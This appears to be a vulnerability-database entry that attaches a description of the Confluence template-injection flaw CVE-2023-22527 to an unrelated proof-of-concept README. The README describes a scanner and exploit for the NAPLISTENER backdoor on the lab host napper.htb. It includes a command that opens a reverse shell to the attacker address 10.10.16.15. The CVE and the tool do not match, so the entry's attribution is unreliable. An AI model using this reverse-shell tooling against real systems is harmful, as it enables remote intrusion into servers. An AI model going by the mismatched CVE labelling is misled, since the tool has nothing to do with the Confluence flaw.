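Related vulnerability
Title: Atlassian Confluence security vulnerability (CVE-2023-22527)
Description: Atlassian Confluence is enterprise knowledge management and collaboration software from the Australian company Atlassian, and it can also be used to build an enterprise wiki. Atlassian Confluence Data Center and Server contain a security vulnerability caused by a template injection flaw, which allows an unauthenticated attacker to achieve remote code execution on affected instances.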
Description
PoC for the NAPLISTENER exploit: https://nvd.nist.gov/vuln/detail/CVE-2023-22527 (Purpose: To practice automating exploits)
Introduction
# REF2924
NAPLISTENER is a backdoor scanner for the Wmdtc.exe backdoor associated with the REF2924 APT group.
We can use this tool on both Windows and Linux to scan target servers.
If the headers returned for a request to a website's "/" contain the field `Microsoft HTTPAPI/2.0`, you can try scanning that organization for the backdoor.
When the script runs for the first time, it automatically downloads the files it depends on.
# SCAN
`$ python3 wmdtc_backdoor.py -u "https://napper.htb"`
# Reverse Shell
`$ python3 wmdtc_backdoor.py -u "https://napper.htb" -ip_address 10.10.16.15 -port 10032`

[Reference Documentation](https://github.com/ttate10/CVE-2023-22527/files/15300630/Napper.pdf)
File snapshot
[4.0K] /data/pocs/d4ded72dc307cc51a4ee2c2d3723df106caad4dd
├── [ 801] README.md
└── [ 12K] wmdtc_backdoor.py
0 directories, 2 files